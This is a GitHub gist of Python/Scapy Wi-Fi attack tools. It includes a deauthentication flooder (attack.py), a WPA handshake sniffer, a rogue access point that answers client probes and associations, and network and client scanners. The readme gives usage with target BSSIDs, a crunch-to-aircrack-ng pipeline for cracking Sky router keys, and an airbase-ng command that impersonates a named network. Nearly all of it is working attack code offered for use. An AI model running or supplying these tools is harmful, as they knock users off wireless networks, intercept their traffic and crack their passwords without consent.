Skip to content

Instantly share code, notes, and snippets.

@garyconstable

garyconstable/attack.py

Last active January 15, 2024 05:20
Show Gist options
  • Save garyconstable/e56e39dd857f0d718fffb29aa8e3dd68 to your computer and use it in GitHub Desktop.
Save garyconstable/e56e39dd857f0d718fffb29aa8e3dd68 to your computer and use it in GitHub Desktop.
Download ZIP
Deauth Attack
Raw
readme.MD

Deauth

network-scanner.py

python network-scanner.py -i wlan0

set-channel.py

python set-channel.py -i wlan0 -c 6

scan-clients.py

python scan-clients.py -i wlan0 -c 1 -b 90:4d:4a:6b:f5:a9

scan-connections.py

python scan-connections.py -i wlan0 -c 1 -b 90:4d:4a:6b:f5:a9

attack.py

python attack.py -i wlan0 -c 1 -b 90:4d:4a:6b:f5:a9

capture-handshake.py

capture-handshake.py wlan0

crunch

Sky Router from a couple of years ago:

crunch 8 8 ABCDEFGHIJKLMNOPQRSTUVWXYZ | aircrack-ng -b 6C:70:9F:E0:C0:78 -w - *.pcap

misc

sudo airodump-ng-oui-update

airodump-ng wlan0
airbase-ng -a 4C:17:EB:AF:AD:4F --essid "SKYFAD4E" -c 1 wlan0
Raw
attack.py
import argparse
from scapy.all import *
def perform_deauth(bssid, client, count):
"""
Send Deauth packets
"""
packet = RadioTap()/Dot11(type=0,subtype=12,addr1=client,addr2=bssid,addr3=bssid)/Dot11Deauth(reason=7)
for n in range(int(count)):
sendp(packet)
"""
pckt = Dot11(addr1=client, addr2=bssid, addr3=bssid) / Dot11Deauth()
cli_to_ap_pckt = None
if client != 'FF:FF:FF:FF:FF:FF' :
cli_to_ap_pckt = Dot11(addr1=bssid, addr2=client, addr3=bssid) / Dot11Deauth()
print 'Sending Deauth to ' + client + ' from ' + bssid
if not count:
exit()
count = int(count)
for x in range(0, int(count)):
try:
# Send out deauth from the AP
sendp(pckt)
# If we're targeting a client, we will also spoof deauth from the client to the AP
if client != 'FF:FF:FF:FF:FF:FF':
send(cli_to_ap_pckt)
except KeyboardInterrupt:
break
"""
def attackTarget(bssid):
"""
Attack the target
"""
print "\n\n"
print '='*100
# Now we have a bssid that we have detected, let's get the client MAC
target_client = raw_input('Enter a client MAC address (Default: FF:FF:FF:FF:FF:FF): ')
if not target_client: target_client = 'FF:FF:FF:FF:FF:FF'
deauth_pckt_count = raw_input('Number of deauth packets (Default: -1 [constant]): ')
print "\n\n"
print '='*100
if not deauth_pckt_count:
deauth_pckt_count = -1
perform_deauth(bssid, target_client, deauth_pckt_count)
def main():
#Set the command line options
parser = argparse.ArgumentParser( description='attack.py - Send Deauth packets')
parser.add_argument('-i', '--interface', dest='iface', type=str, required=True, help='WIFI Interface')
parser.add_argument('-c', '--channel', dest='channel', type=str, required=False, help='Wifi Channel')
parser.add_argument('-b', '--bssid', dest='bssid', type=str, required=True, help='BSSID')
#Get the command line options
args = parser.parse_args()
#start the attack
attackTarget(args.bssid)
if __name__ == "__main__":
main()
Raw
capture-handshake.py
import sys
from scapy.all import *
import datetime
"""
Capture Hand Shake
"""
class CaptureHandShake():
"""
Init
"""
def __init__(self, iface):
self.wpa_handshake = []
self.iface = iface
self.acceptAny = False
self.packetMax = 100
self.packetCount = 0
"""
Handle the packets
"""
def handle_packet(self, packet):
if self.acceptAny == True:
print packet.summary()
self.wpa_handshake.append(packet)
self.packetCount += 1
if self.packetCount == self.packetMax:
filename = "pcaps/wpa-handshake-" + str(datetime.datetime.now().strftime("%Y-%m-%d-%H-%M-%S")) + ".pcap"
wrpcap(filename, self.wpa_handshake)
self.wpa_handshake = []
self.acceptAny = False
self.packetCount = 0
else:
#got EAPOL KEY packet
if (packet.haslayer(EAPOL) and packet.type == 2) or self.acceptAny == True:
print packet.summary()
self.wpa_handshake.append(packet)
#if we have 4 packets
if len(self.wpa_handshake) >= 4:
self.acceptAny = True
print "\n"
print '='*100
print "\n"
"""
Start the sniffer
"""
def start(self):
os.system("clear")
print '='*100
print "Sniffing on interface: " + self.iface
print '='*100
sniff(iface=self.iface, prn=self.handle_packet)
def main():
if len(sys.argv) == 2:
iface = str(sys.argv[1])
else:
iface = "wlan0"
sn = CaptureHandShake(iface)
sn.start()
if __name__ == '__main__':
main()
Raw
man-in-middle.py
import os
import sys
import time
import getopt
from scapy.all import *
"""
use: ip addr to get mac address info
"""
iface = "wlan0"
ssid_filter = []
client_addr = None
mymac = "00:c0:ca:87:58:3d"
def get_rates(packet):
"""
Extract rates and esrates from elt header
"""
rates = "\x82\x84\x0b\x16"
esrates = "\x0c\x12\x18"
while Dot11Elt in packet:
packet = packet [Dot11Elt]
if packet.ID == 1:
rates = packet.info
elif packet.ID == 50:
esrates = packet.info
packet = packet.payload
return [rates, esrates]
def send_probe_response(packet):
"""
send a prob response
"""
ssid = packet.info
rates = get_rates(packet)
channel = "\x07"
if ssid_filter and ssid not in ssid_filter:
return
print "\n\nSending probe response for " + ssid + " To " + str(packet[Dot11].addr2) + "\n"
# addr1 = Destination, addr2 = source,
# Addr3 = Access Point
# Dsset sets channel
cap = 'ESS+privacy+short-preamble+short-slot'
resp = RadioTap() / \
Dot11(addr1 = packet[Dot11].addr2, addr2 = mymac, addr3 = mymac) / \
Dot11ProbeResp(timestamp = time.time(), cap = cap) / \
Dot11Elt(ID = "SSID", info = ssid) / \
Dot11Elt(ID = "Rates", info = rates[0]) / \
Dot11Elt(ID = "DSset", info = channel) / \
Dot11Elt(ID = "ESRates", info = rates[1])
sendp(resp, iface = iface)
def send_auth_response(packet):
"""
Do not answer our own auth packets
"""
if packet[Dot11].addr2 != mymac:
print "Sending authentication to " + packet[Dot11].addr2
res = RadioTap() / \
Dot11(addr1 = packet[Dot11].addr2, addr2 = mymac, addr3 = mymac) / \
Dot11Auth(algo = 0, seqnum = 2, status = 0)
sendp(res, iface = iface)
def send_association_response(packet):
"""
send_association_response
"""
if ssid_filter and ssid not in ssid_filter:
return
ssid = packet.info
rates = get_rates(packet)
print "Sending Association response for " + ssid + " To " + packet[Dot11].addr2
res = RadioTap() / \
Dot11(addr1 = packet[Dot11].addr2, addr2 = mymac, addr3 = mymac) / \
Dot11AssoResp(AID = 2) / \
Dot11Elt(ID = "Rates", info = rates[0]) / \
Dot11Elt(ID = "ESRates", info = rates[1])
sendp (res, iface = iface)
def handle_packet (packet):
"""
This function is called for every captured packet
"""
sys.stdout.write(".")
sys.stdout.flush()
if client_addr and packet.addr2 != client_addr:
return
# Got probe request
if packet.haslayer(Dot11ProbeReq):
send_probe_response(packet)
# Got Authenticaton request
elif packet.haslayer(Dot11Auth):
send_auth_response(packet)
# Got association request
elif packet.haslayer(Dot11AssoReq):
send_association_response (packet)
def usage ():
print sys.argv [0]
print """
-A <addr> (optional)
-I <interface> (optional)
-M <source_mac> (optional)
-S <ssid1,ssid2> (optional)
"""
sys.exit (1)
# Parsing parameters
if len (sys.argv) == 2 and sys.argv [1] == "- help":
usage()
try:
cmd_opts = "a: i: m: s: "
opts, args = getopt.getopt (sys.argv [1:], cmd_opts)
except getopt.GetoptError:
usage()
for opt in opts:
if opt [0] == "a":
client_addr = opt
elif opt [0] == "-i":
iface = opt [1]
elif opt [0] == "-m":
my_mac = opt [1]
elif opt [0] == "-s":
ssid_filter = opt
else:
usage()
os.system("ifconfig " + iface + " down")
os.system("iwconfig " + iface + " mode monitor")
os.system("ifconfig " + iface + " up")
#Start sniffing
print "Sniffing on interface: " + iface
sniff (iface = iface, prn = handle_packet)
Raw
network-scanner.py
import argparse
from multiprocessing import Process
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
import signal
import threading
channel_hop = None
networks = {}
stop_sniffing = False
def add_network(pckt):
"""
Add a found network to the list
"""
essid = pckt[Dot11Elt].info if '\x00' not in pckt[Dot11Elt].info and pckt[Dot11Elt].info != '' else 'Hidden SSID'
bssid = pckt[Dot11].addr3
channel = int(ord(pckt[Dot11Elt:3].info))
if bssid not in networks:
networks[bssid] = ( essid, channel )
print "{0:5}\t{1:30}\t{2:30}".format(channel, essid, bssid)
def channel_hopper(iface):
"""
Switch channels
"""
while True:
try:
channel = random.randrange(1,14)
os.system("iwconfig %s channel %d" % (iface, channel))
time.sleep(1)
except KeyboardInterrupt:
stop_sniffing = True
break
def start_sniffer(iface):
"""
Start the network sniffer
"""
stop_sniffing = False
os.system("clear")
print '='*100
print "\nPress CTRL+c to stop sniffing..\n"
print '='*100 + '\n{0:5}\t{1:30}\t{2:30}\n'.format('Channel','ESSID','BSSID') + '='*100
channel_hop = Process(target = channel_hopper, args=(iface,))
channel_hop.start()
try:
sniff( lfilter = lambda x: (x.haslayer(Dot11Beacon) or x.haslayer(Dot11ProbeResp)), stop_filter=stop_sniffing, prn=lambda x: add_network(x) )
print'----> after sniff'
except Exception, e:
print 'Err: ' + str(e)
pass
def monitorMode(iface):
"""
Turn on monitor mode
"""
os.system("ifconfig " + iface + " down")
os.system("iwconfig " + iface + " mode monitor")
os.system("ifconfig " + iface + " up")
def main():
"""
Set the command line options
"""
parser = argparse.ArgumentParser( description='deauth.py - Perform a Deauth WIFI Attack - python deauth.py -i wlan0 -m 1')
parser.add_argument('-i', '--interface', dest='iface', type=str, required=True, help='WIFI Interface')
parser.add_argument('-m', '--monitormode', dest='monitor', type=str, required=False, help='Activate Monitor Mode')
args = parser.parse_args()
conf.iface = args.iface
monitorMode(conf.iface)
start_sniffer(conf.iface)
if __name__ == "__main__":
main()
Raw
scan-clients.py
import argparse
from scapy.all import *
iface = None
channel = None
bssid = None
def packet_info(pkt):
"""
show the packet details
"""
bssid = pkt[Dot11].addr3
p = pkt[Dot11Elt]
cap = pkt.sprintf("{Dot11Beacon:%Dot11Beacon.cap%}"
"{Dot11ProbeResp:%Dot11ProbeResp.cap%}").split('+')
ssid, channel = None, None
crypto = set()
while isinstance(p, Dot11Elt):
if p.ID == 0:
ssid = p.info
elif p.ID == 3:
channel = ord(p.info)
elif p.ID == 48:
crypto.add("WPA2")
elif p.ID == 221 and p.info.startswith('\x00P\xf2\x01\x01\x00'):
crypto.add("WPA")
p = p.payload
if not crypto:
if 'privacy' in cap:
crypto.add("WEP")
else:
crypto.add("OPN")
print " %r [%s], %s" % (ssid, bssid,' / '.join(crypto) )
def switchChannel(iface, channel):
"""
swicth to a channel
"""
os.system("iwconfig %s channel %d" % (iface, channel))
def getClients(pkt):
"""
Get the clients for the BSSID
"""
try:
packet_bssid = pkt[Dot11].addr3
if packet_bssid == bssid and not pkt.haslayer(Dot11Beacon) and not pkt.haslayer(Dot11ProbeReq) and not pkt.haslayer(Dot11ProbeResp):
print pkt.summary()
elif packet_bssid == bssid and ( pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeReq) or pkt.haslayer(Dot11ProbeResp) ):
print('---> Known BSSID')
#http://stackoverflow.com/questions/21613091/how-to-use-scapy-to-determine-wireless-encryption-type
packet_info(pkt)
except:
pass
def sniffClients():
"""
Set the target channel, start sniffing, send packets to getClients()
"""
stopSniffing = False
sniff(iface=iface, prn=getClients, stop_filter=stopSniffing )
while True:
try:
num = 1
except KeyboardInterrupt:
stopSniffing = True
pass
def main():
#parse args
parser = argparse.ArgumentParser( description='search-clients.py - Search for clients on Channel / BSSID')
parser.add_argument('-i', '--interface', dest='iface', type=str, required=True, help='WIFI Interface')
parser.add_argument('-c', '--channel', dest='channel', type=str, required=True, help='Wifi Channel')
parser.add_argument('-b', '--bssid', dest='bssid', type=str, required=True, help='BSSID')
#set args
args = parser.parse_args()
iface = args.iface
channel = args.channel
bssid = args.bssid
#sniff for clients
sniffClients()
if __name__ == "__main__":
main()
Raw
scan-connections.py
import argparse
from scapy.all import *
iface = None
channel = None
bssid = None
def switchChannel(iface, channel):
"""
swicth to a channel
"""
os.system("iwconfig %s channel %d" % (iface, channel))
def getClients(pkt):
"""
Get the clients for the BSSID
"""
packet_bssid = pkt[Dot11].addr3
if packet_bssid == bssid and ( pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeReq) or pkt.haslayer(Dot11ProbeResp) ):
print pkt.summary()
def sniffClients():
"""
Set the target channel, start sniffing, send packets to getClients()
"""
stopSniffing = False
sniff(iface=iface, prn=getClients, stop_filter=stopSniffing )
while True:
try:
num = 1
except KeyboardInterrupt:
stopSniffing = True
pass
def main():
#parse args
parser = argparse.ArgumentParser( description='search-clients.py - Search for clients on Channel / BSSID')
parser.add_argument('-i', '--interface', dest='iface', type=str, required=True, help='WIFI Interface')
parser.add_argument('-c', '--channel', dest='channel', type=str, required=True, help='Wifi Channel')
parser.add_argument('-b', '--bssid', dest='bssid', type=str, required=True, help='BSSID')
#set args
args = parser.parse_args()
iface = args.iface
channel = args.channel
bssid = args.bssid
#sniff for clients
sniffClients()
if __name__ == "__main__":
main()
Raw
set-channel.py
import argparse
from scapy.all import *
def setChannel(iface, channel):
"""
Switch channels
"""
os.system("iwconfig %s channel %d" % (iface, channel))
def monitorMode(iface):
"""
Turn on monitor mode
"""
os.system("ifconfig " + iface + " down")
os.system("iwconfig " + iface + " mode monitor")
os.system("ifconfig " + iface + " up")
def main():
"""
run script
"""
parser = argparse.ArgumentParser( description='deauth.py - Perform a Deauth WIFI Attack - python deauth.py -i wlan0 -m 1')
parser.add_argument('-i', '--interface', dest='iface', type=str, required=True, help='WIFI Interface')
parser.add_argument('-c', '--channel', dest='channel', type=str, required=True, help='WIFI Channel')
args = parser.parse_args()
monitorMode(args.iface)
setChannel(args.iface, args.channel)
if __name__ == "__main__":
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment